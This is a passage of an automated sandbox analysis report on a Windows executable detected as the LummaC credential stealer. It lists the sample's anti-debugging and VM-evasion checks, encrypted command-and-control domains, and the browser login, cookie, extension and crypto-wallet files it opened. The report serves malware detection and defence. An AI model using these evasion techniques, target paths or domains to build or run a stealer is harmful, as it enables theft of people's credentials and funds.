0x00000063 mov esi, dword ptr [ebp+0Ch] 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F0FE0B8ED42h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0AC5 second address: 53A0ADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov al, 49h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov bx, D542h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0B7A second address: 53A0BF0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0FE0B8ED44h 0x0000000c add si, C058h 0x00000011 jmp 00007F0FE0B8ED3Bh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov esi, 33F9FF2Bh 0x0000001f pushad 0x00000020 call 00007F0FE0B8ED3Eh 0x00000025 pop esi 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007F0FE0B8ED47h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0FE0B8ED45h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0C26 second address: 53A0C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0FE14B0517h 0x00000008 movzx esi, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f jmp 00007F0FE14B050Bh 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0FE14B0515h 0x0000001c rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Special instruction interceptor: First address: 348D95 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Special instruction interceptor: First address: 348ECE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Special instruction interceptor: First address: 50E70D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Special instruction interceptor: First address: 56A78F instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window / User API: threadDelayed 1606	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window / User API: threadDelayed 1570	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window / User API: threadDelayed 1112	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window / User API: threadDelayed 1114	Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644	Thread sleep count: 1606 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644	Thread sleep time: -3213606s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5052	Thread sleep count: 1570 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5052	Thread sleep time: -3141570s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 380	Thread sleep count: 1112 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 380	Thread sleep time: -2225112s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5844	Thread sleep count: 1114 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5844	Thread sleep time: -2229114s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 828	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 6948	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 6948	Thread sleep time: -136068s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5052	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe TID: 5644	Thread sleep time: -78039s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: 6GNqkkKY0j.exe, 00000000.00000002.3078017104.00000000004C6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696049293.0000000005D54000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 6GNqkkKY0j.exe, 6GNqkkKY0j.exe, 00000000.00000003.2397441650.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397503538.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042577318.00000000013E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696049293.0000000005D54000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 6GNqkkKY0j.exe, 00000000.00000002.3078017104.00000000004C6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 6GNqkkKY0j.exe, 00000000.00000003.2696346225.0000000005CE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: NTICE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: SICE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: bashfulacid.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tentabatte.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: curverpluch.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: talkynicer.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: shapestickyr.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: manyrestro.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: slipperyloo.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wordyfindy.lat
Source: 6GNqkkKY0j.exe, 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: observerfry.lat

Source: 6GNqkkKY0j.exe, 00000000.00000002.3078363659.000000000050D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: S-:Program Manager

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081447862.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 6GNqkkKY0j.exe PID: 3500, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 6GNqkkKY0j.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: 6GNqkkKY0j.exe	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: 6GNqkkKY0j.exe	String found in binary or memory: Wallets/JAXX New Version
Source: 6GNqkkKY0j.exe	String found in binary or memory: window-state.json
Source: 6GNqkkKY0j.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 6GNqkkKY0j.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 6GNqkkKY0j.exe	String found in binary or memory: Wallets/Ethereum
Source: 6GNqkkKY0j.exe, 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: 6GNqkkKY0j.exe, 00000000.00000003.3075588998.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
